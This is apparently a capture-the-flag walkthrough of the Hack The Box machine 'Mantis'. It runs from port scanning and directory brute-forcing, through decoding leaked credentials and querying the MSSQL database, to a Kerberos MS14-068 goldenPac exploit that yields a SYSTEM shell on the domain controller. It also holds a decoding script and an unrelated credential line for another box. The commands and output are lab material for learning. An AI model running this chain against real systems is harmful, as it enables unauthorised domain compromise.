Mantis

1. User

1.1. Recon

1.1.1. PortScan

Starting Nmap 7.95 ( https://nmap.org ) at 2025-10-18 03:29 EDT
Nmap scan report for 10.129.183.192
Host is up (0.080s latency).

PORT      STATE SERVICE      VERSION
53/tcp    open  domain       Microsoft DNS 6.1.7601 (1DB15CD4) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_  bind.version: Microsoft DNS 6.1.7601 (1DB15CD4)
88/tcp    open  kerberos-sec Microsoft Windows Kerberos (server time: 2025-10-18 07:29:41Z)
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
389/tcp   open  ldap         Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds Windows Server 2008 R2 Standard 7601 Service Pack 1 microsoft-ds (workgroup: HTB)
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
1337/tcp  open  http         Microsoft IIS httpd 7.5
|_http-title: IIS7
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
1433/tcp  open  ms-sql-s     Microsoft SQL Server 2014 12.00.2000.00; RTM
| ms-sql-ntlm-info:
|   10.129.183.192:1433:
|     Target_Name: HTB
|     NetBIOS_Domain_Name: HTB
|     NetBIOS_Computer_Name: MANTIS
|     DNS_Domain_Name: htb.local
|     DNS_Computer_Name: mantis.htb.local
|     DNS_Tree_Name: htb.local
|_    Product_Version: 6.1.7601
| ms-sql-info:
|   10.129.183.192:1433:
|     Version:
|       name: Microsoft SQL Server 2014 RTM
|       number: 12.00.2000.00
|       Product: Microsoft SQL Server 2014
|       Service pack level: RTM
|       Post-SP patches applied: false
|_    TCP port: 1433
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2025-10-18T07:21:42
|_Not valid after:  2055-10-18T07:21:42
|_ssl-date: 2025-10-18T07:30:54+00:00; +2s from scanner time.
3268/tcp  open  ldap         Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5722/tcp  open  msrpc        Microsoft Windows RPC
8080/tcp  open  http         Microsoft IIS httpd 7.5
|_http-title: Tossed Salad - Blog
|_http-server-header: Microsoft-IIS/7.5
9389/tcp  open  mc-nmf       .NET Message Framing
47001/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49152/tcp open  msrpc        Microsoft Windows RPC
49153/tcp open  msrpc        Microsoft Windows RPC
49154/tcp open  msrpc        Microsoft Windows RPC
49155/tcp open  msrpc        Microsoft Windows RPC
49157/tcp open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
49158/tcp open  msrpc        Microsoft Windows RPC
49167/tcp open  msrpc        Microsoft Windows RPC
49170/tcp open  msrpc        Microsoft Windows RPC
49173/tcp open  msrpc        Microsoft Windows RPC
50255/tcp open  ms-sql-s     Microsoft SQL Server 2014 12.00.2000.00; RTM
| ms-sql-ntlm-info:
|   10.129.183.192:50255:
|     Target_Name: HTB
|     NetBIOS_Domain_Name: HTB
|     NetBIOS_Computer_Name: MANTIS
|     DNS_Domain_Name: htb.local
|     DNS_Computer_Name: mantis.htb.local
|     DNS_Tree_Name: htb.local
|_    Product_Version: 6.1.7601
| ms-sql-info:
|   10.129.183.192:50255:
|     Version:
|       name: Microsoft SQL Server 2014 RTM
|       number: 12.00.2000.00
|       Product: Microsoft SQL Server 2014
|       Service pack level: RTM
|       Post-SP patches applied: false
|_    TCP port: 50255
|_ssl-date: 2025-10-18T07:30:54+00:00; +2s from scanner time.
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2025-10-18T07:21:42
|_Not valid after:  2055-10-18T07:21:42
Service Info: Host: MANTIS; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows

Host script results:
| smb-os-discovery:
|   OS: Windows Server 2008 R2 Standard 7601 Service Pack 1 (Windows Server 2008 R2 Standard 6.1)
|   OS CPE: cpe:/o:microsoft:windows_server_2008::sp1
|   Computer name: mantis
|   NetBIOS computer name: MANTIS\x00
|   Domain name: htb.local
|   Forest name: htb.local
|   FQDN: mantis.htb.local
|_  System time: 2025-10-18T03:30:46-04:00
| smb2-time:
|   date: 2025-10-18T07:30:45
|_  start_date: 2025-10-18T07:21:38
| smb2-security-mode:
|   2:1:0:
|_    Message signing enabled and required
|_clock-skew: mean: 34m19s, deviation: 1h30m44s, median: 1s
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: required

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 92.48 seconds

1.1.2. smb

┌──(root㉿kali)-[~/Desktop/htb/Mantis]
└─# nxc smb  10.129.255.35 -u '' -p '' --shares
SMB         10.129.255.35   445    MANTIS           [*] Windows Server 2008 R2 Standard 7601 Service Pack 1 x64 (name:MANTIS) (domain:htb.local) (signing:True) (SMBv1:True) (Null Auth:True)
SMB         10.129.255.35   445    MANTIS           [+] htb.local\:
SMB         10.129.255.35   445    MANTIS           [-] Error enumerating shares: STATUS_ACCESS_DENIED

1.2. web 1337

(screenshot: default IIS7 page on port 1337)

┌──(root㉿kali)-[~/Desktop/htb/Mantis]
└─# dirsearch -u http://10.129.255.35:1337 -x 403,404
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  from pkg_resources import DistributionNotFound, VersionConflict

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460

Output File: /root/Desktop/htb/Mantis/reports/http_10.129.255.35_1337/_25-10-18_15-51-43.txt

Target: http://10.129.255.35:1337/

[15:51:43] Starting:
[15:51:56] 301 -  163B  - /aspnet_client  ->  http://10.129.255.35:1337/aspnet_client/

Task Completed
┌──(root㉿kali)-[~/Desktop/htb/Mantis]
└─# dirsearch -u http://10.129.255.35:1337 -x 403,404 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  from pkg_resources import DistributionNotFound, VersionConflict

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 220545

Output File: /root/Desktop/htb/Mantis/reports/http_10.129.255.35_1337/_25-10-18_15-55-41.txt

Target: http://10.129.255.35:1337/

[15:55:41] Starting:
[15:56:51] 500 -    3KB - /orchard
>>>> [16:00:32] 301 -  162B  - /secure_notes  ->  http://10.129.255.35:1337/secure_notes/

Task Completed

(screenshot: /secure_notes/ directory listing)

There is something in there.

┌──(root㉿kali)-[~/Desktop/htb/Mantis]
└─# curl http://10.129.255.35:1337/secure_notes/dev_notes_NmQyNDI0NzE2YzVmNTM0MDVmNTA0MDczNzM1NzMwNzI2NDIx.txt.txt
1. Download OrchardCMS
2. Download SQL server 2014 Express ,create user "admin",and create orcharddb database
3. Launch IIS and add new website and point to Orchard CMS folder location.
4. Launch browser and navigate to http://localhost:8080
5. Set admin password and configure sQL server connection string.
6. Add blog pages with admin user.
(long run of blank lines in the note omitted)
Credentials stored in secure format
OrchardCMS admin creadentials 010000000110010001101101001000010110111001011111010100000100000001110011011100110101011100110000011100100110010000100001
SQL Server sa credentials file namez

┌──(root㉿kali)-[~/Desktop/htb/Mantis]
└─# curl http://10.129.255.35:1337/secure_notes/web.config  -I
HTTP/1.1 404 Not Found
Content-Length: 1245
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sat, 18 Oct 2025 20:17:44 GMT

This gives us a credential.

# OrchardCMS admin credentials
┌──(root㉿kali)-[~/Desktop/htb/Mantis]
└─# echo "010000000110010001101101001000010110111001011111010100000100000001110011011100110101011100110000011100100110010000100001" | perl -lpe '$_=pack"B*",$_'
@dm!n_P@ssW0rd!

admin @dm!n_P@ssW0rd!

The file name is unusual too; it looks like base64.

┌──(root㉿kali)-[~/Desktop/htb/Mantis]
└─# echo 'NmQyNDI0NzE2YzVmNTM0MDVmNTA0MDczNzM1NzMwNzI2NDIx' |base64 -d |xxd  -ps -r
m$$ql_S@_P@ssW0rd!

m$$ql_S@_P@ssW0rd!: this is obviously the MSSQL password.
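The two one-liners above (perl `pack "B*"` for the bit string, `base64 -d | xxd -ps -r` for the file name) are the whole decoding chain. As an added example that is not part of the original notes, the same two decodings in Python, generalised into a small helper that tries the encodings seen on this host in order and reports which one produced printable text. The two encoded inputs are copied from the note and the file name; the function names are my own.

```python
import base64
import binascii
import re

# Copied from the dev note (the 120-bit "secure format" string) and from the
# note's own file name. Both are the values shown on the page, nothing else.
BINARY_NOTE = ("01000000011001000110110100100001011011100101111101010000"
               "01000000011100110111001101010111001100000111001001100100"
               "00100001")
FILE_NAME = "dev_notes_NmQyNDI0NzE2YzVmNTM0MDVmNTA0MDczNzM1NzMwNzI2NDIx.txt.txt"


def decode_bit_string(bits: str) -> str:
    """Pack a run of '0'/'1' characters into bytes, 8 bits per byte, MSB first
    (what perl's pack "B*" does)."""
    bits = re.sub(r"\s+", "", bits)
    if len(bits) % 8 or set(bits) - {"0", "1"}:
        raise ValueError("not a byte-aligned bit string")
    raw = int(bits, 2).to_bytes(len(bits) // 8, "big")
    return raw.decode("ascii")


def decode_base64_hex(token: str) -> str:
    """Undo base64 -> hex text -> bytes, the same chain as `base64 -d | xxd -ps -r`."""
    hex_text = base64.b64decode(token, validate=True).decode("ascii")
    return binascii.unhexlify(hex_text).decode("ascii")


def extract_base64_token(name: str) -> str:
    """Pull the base64-looking segment out of a name like dev_notes_<token>.txt.txt."""
    m = re.search(r"([A-Za-z0-9+/]{16,}={0,2})", name)
    if not m:
        raise ValueError("no base64-looking token in name")
    return m.group(1)


def auto_decode(token: str) -> tuple:
    """Try each encoding in turn; return (encoding_name, plaintext) for the first
    one that yields printable text, so a note author's "secure format" is
    identified rather than guessed by hand."""
    attempts = (
        ("bit-string", decode_bit_string),
        ("base64(hex)", decode_base64_hex),
        ("base64", lambda t: base64.b64decode(t, validate=True).decode("ascii")),
    )
    for name, fn in attempts:
        try:
            text = fn(token)
        except (ValueError, UnicodeDecodeError):  # binascii.Error is a ValueError
            continue
        if text.isprintable():
            return name, text
    raise ValueError("no known encoding produced printable text")


if __name__ == "__main__":
    for label, token in (("note body", BINARY_NOTE),
                         ("file name", extract_base64_token(FILE_NAME))):
        enc, text = auto_decode(token)
        print(f"{label}: {enc} -> {text}")
```

The point for the defender is that neither layer is encryption: a bit string and base64-of-hex are both reversible by anyone who can read the file, so a world-readable note under the web root leaks both the CMS admin password and the SQL password regardless of the "secure format" label.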

┌──(root㉿kali)-[~/Desktop/htb/Mantis]
└─# nxc mssql 10.129.242.213 -u 'admin' -p 'm$$ql_S@_P@ssW0rd!' --local-auth
MSSQL       10.129.242.213  1433   MANTIS           [*] Windows 7 / Server 2008 R2 Build 7601 (name:MANTIS) (domain:htb.local)
MSSQL       10.129.242.213  1433   MANTIS           [+] MANTIS\admin:m$$ql_S@_P@ssW0rd!

1.3. mssql

SQL (admin  admin@orcharddb)> SELECT * FROM INFORMATION_SCHEMA.TABLES;
TABLE_CATALOG   TABLE_SCHEMA   TABLE_NAME                                             TABLE_TYPE
-------------   ------------   ----------------------------------------------------   ----------
orcharddb       dbo            blog_Orchard_Blogs_RecentBlogPostsPartRecord           b'BASE TABLE'
orcharddb       dbo            blog_Orchard_Blogs_BlogArchivesPartRecord              b'BASE TABLE'
orcharddb       dbo            blog_Orchard_Workflows_TransitionRecord                b'BASE TABLE'
orcharddb       dbo            blog_Orchard_Workflows_WorkflowRecord                  b'BASE TABLE'
orcharddb       dbo            blog_Orchard_Workflows_WorkflowDefinitionRecord        b'BASE TABLE'
orcharddb       dbo            blog_Orchard_Workflows_AwaitingActivityRecord          b'BASE TABLE'
orcharddb       dbo            blog_Orchard_Workflows_ActivityRecord                  b'BASE TABLE'
orcharddb       dbo            blog_Orchard_Tags_TagsPartRecord                       b'BASE TABLE'
orcharddb       dbo            blog_Orchard_Framework_DataMigrationRecord             b'BASE TABLE'
orcharddb       dbo            blog_Orchard_Tags_TagRecord                            b'BASE TABLE'
orcharddb       dbo            blog_Orchard_Tags_ContentTagRecord                     b'BASE TABLE'
orcharddb       dbo            blog_Settings_ContentFieldDefinitionRecord             b'BASE TABLE'
orcharddb       dbo            blog_Orchard_Framework_DistributedLockRecord           b'BASE TABLE'
orcharddb       dbo            blog_Settings_ContentPartDefinitionRecord              b'BASE TABLE'
orcharddb       dbo            blog_Settings_ContentPartFieldDefinitionRecord         b'BASE TABLE'
orcharddb       dbo            blog_Settings_ContentTypeDefinitionRecord              b'BASE TABLE'
orcharddb       dbo            blog_Settings_ContentTypePartDefinitionRecord          b'BASE TABLE'
orcharddb       dbo            blog_Settings_ShellDescriptorRecord                    b'BASE TABLE'
orcharddb       dbo            blog_Settings_ShellFeatureRecord                       b'BASE TABLE'
orcharddb       dbo            blog_Settings_ShellFeatureStateRecord                  b'BASE TABLE'
orcharddb       dbo            blog_Settings_ShellParameterRecord                     b'BASE TABLE'
orcharddb       dbo            blog_Settings_ShellStateRecord                         b'BASE TABLE'
orcharddb       dbo            blog_Orchard_Framework_ContentItemRecord               b'BASE TABLE'
orcharddb       dbo            blog_Orchard_Framework_ContentItemVersionRecord        b'BASE TABLE'
orcharddb       dbo            blog_Orchard_Framework_ContentTypeRecord               b'BASE TABLE'
orcharddb       dbo            blog_Orchard_Framework_CultureRecord                   b'BASE TABLE'
orcharddb       dbo            blog_Common_BodyPartRecord                             b'BASE TABLE'
orcharddb       dbo            blog_Common_CommonPartRecord                           b'BASE TABLE'
orcharddb       dbo            blog_Common_CommonPartVersionRecord                    b'BASE TABLE'
orcharddb       dbo            blog_Common_IdentityPartRecord                         b'BASE TABLE'
orcharddb       dbo            blog_Containers_ContainerPartRecord                    b'BASE TABLE'
orcharddb       dbo            blog_Containers_ContainerWidgetPartRecord              b'BASE TABLE'
orcharddb       dbo            blog_Containers_ContainablePartRecord                  b'BASE TABLE'
orcharddb       dbo            blog_Title_TitlePartRecord                             b'BASE TABLE'
orcharddb       dbo            blog_Navigation_MenuPartRecord                         b'BASE TABLE'
orcharddb       dbo            blog_Navigation_AdminMenuPartRecord                    b'BASE TABLE'
orcharddb       dbo            blog_Scheduling_ScheduledTaskRecord                    b'BASE TABLE'
orcharddb       dbo            blog_Orchard_ContentPicker_ContentMenuItemPartRecord   b'BASE TABLE'
orcharddb       dbo            blog_Orchard_Alias_AliasRecord                         b'BASE TABLE'
orcharddb       dbo            blog_Orchard_Alias_ActionRecord                        b'BASE TABLE'
orcharddb       dbo            blog_Orchard_Autoroute_AutoroutePartRecord             b'BASE TABLE'
orcharddb       dbo            blog_Orchard_Users_UserPartRecord                      b'BASE TABLE'
orcharddb       dbo            blog_Orchard_Roles_PermissionRecord                    b'BASE TABLE'
orcharddb       dbo            blog_Orchard_Roles_RoleRecord                          b'BASE TABLE'
orcharddb       dbo            blog_Orchard_Roles_RolesPermissionsRecord              b'BASE TABLE'
orcharddb       dbo            blog_Orchard_Roles_UserRolesPartRecord                 b'BASE TABLE'
orcharddb       dbo            blog_Orchard_Packaging_PackagingSource                 b'BASE TABLE'
orcharddb       dbo            blog_Orchard_Recipes_RecipeStepResultRecord            b'BASE TABLE'
orcharddb       dbo            blog_Orchard_OutputCache_CacheParameterRecord          b'BASE TABLE'
orcharddb       dbo            blog_Orchard_MediaProcessing_ImageProfilePartRecord    b'BASE TABLE'
orcharddb       dbo            blog_Orchard_MediaProcessing_FilterRecord              b'BASE TABLE'
orcharddb       dbo            blog_Orchard_MediaProcessing_FileNameRecord            b'BASE TABLE'
orcharddb       dbo            blog_Orchard_Widgets_LayerPartRecord                   b'BASE TABLE'
orcharddb       dbo            blog_Orchard_Widgets_WidgetPartRecord                  b'BASE TABLE'
orcharddb       dbo            blog_Orchard_Comments_CommentPartRecord                b'BASE TABLE'
orcharddb       dbo            blog_Orchard_Comments_CommentsPartRecord               b'BASE TABLE'
orcharddb       dbo            blog_Orchard_Taxonomies_TaxonomyPartRecord             b'BASE TABLE'
orcharddb       dbo            blog_Orchard_Taxonomies_TermPartRecord                 b'BASE TABLE'
orcharddb       dbo            blog_Orchard_Taxonomies_TermContentItem                b'BASE TABLE'
orcharddb       dbo            blog_Orchard_Taxonomies_TermsPartRecord                b'BASE TABLE'
orcharddb       dbo            blog_Orchard_MediaLibrary_MediaPartRecord              b'BASE TABLE'
orcharddb       dbo            blog_Orchard_Blogs_BlogPartArchiveRecord               b'BASE TABLE'

The tables hold too much data to read comfortably here, so connect with a GUI client instead.

The cleartext password can be read straight out of the table.
(screenshot of the query result omitted)

James J@m3s_P@ssW0rd!

┌──(root㉿kali)-[~/Desktop/htb/Mantis]
└─# adr  james nxc  smb

Running command: nxc smb 10.129.242.213 -u 'james' -p 'J@m3s_P@ssW0rd!'

SMB         10.129.242.213  445    MANTIS           [*] Windows Server 2008 R2 Standard 7601 Service Pack 1 x64 (name:MANTIS) (domain:htb.local) (signing:True) (SMBv1:True) (Null Auth:True)
SMB         10.129.242.213  445    MANTIS           [+] htb.local\james:J@m3s_P@ssW0rd!

Command: nxc smb 10.129.242.213 -u 'james' -p 'J@m3s_P@ssW0rd!'

1.4. user as james

┌──(root㉿kali)-[~/Desktop/htb/Mantis]
└─# nxc smb 10.129.242.213 -u 'james' -p 'J@m3s_P@ssW0rd!' --generate-tgt james
SMB         10.129.242.213  445    MANTIS           [*] Windows Server 2008 R2 Standard 7601 Service Pack 1 x64 (name:MANTIS) (domain:htb.local) (signing:True) (SMBv1:True) (Null Auth:True)
SMB         10.129.242.213  445    MANTIS           [+] htb.local\james:J@m3s_P@ssW0rd!
SMB         10.129.242.213  445    MANTIS           [+] TGT saved to: james.ccache
SMB         10.129.242.213  445    MANTIS           [+] Run the following command to use the TGT: export KRB5CCNAME=james.ccache

hercules.htb ken.w:change* th1s_p@ssw ()rd!!

1.5. bloodhound

(BloodHound graph screenshot omitted)

2. system

┌──(root㉿kali)-[~/Desktop/htb/Mantis]
└─# impacket-goldenPac 'htb.local/james:J@m3s_P@ssW0rd!@mantis'
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies

[*] User SID: S-1-5-21-4220043660-4019079961-2895681657-1103
[*] Forest SID: S-1-5-21-4220043660-4019079961-2895681657
[*] Attacking domain controller mantis.htb.local
[*] mantis.htb.local found vulnerable!
[*] Requesting shares on mantis.....
[*] Found writable share ADMIN$
[*] Uploading file craJpUBS.exe
[*] Opening SVCManager on mantis.....
[*] Creating service tMrZ on mantis.....
[*] Starting service tMrZ.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>whoami
nt authority\system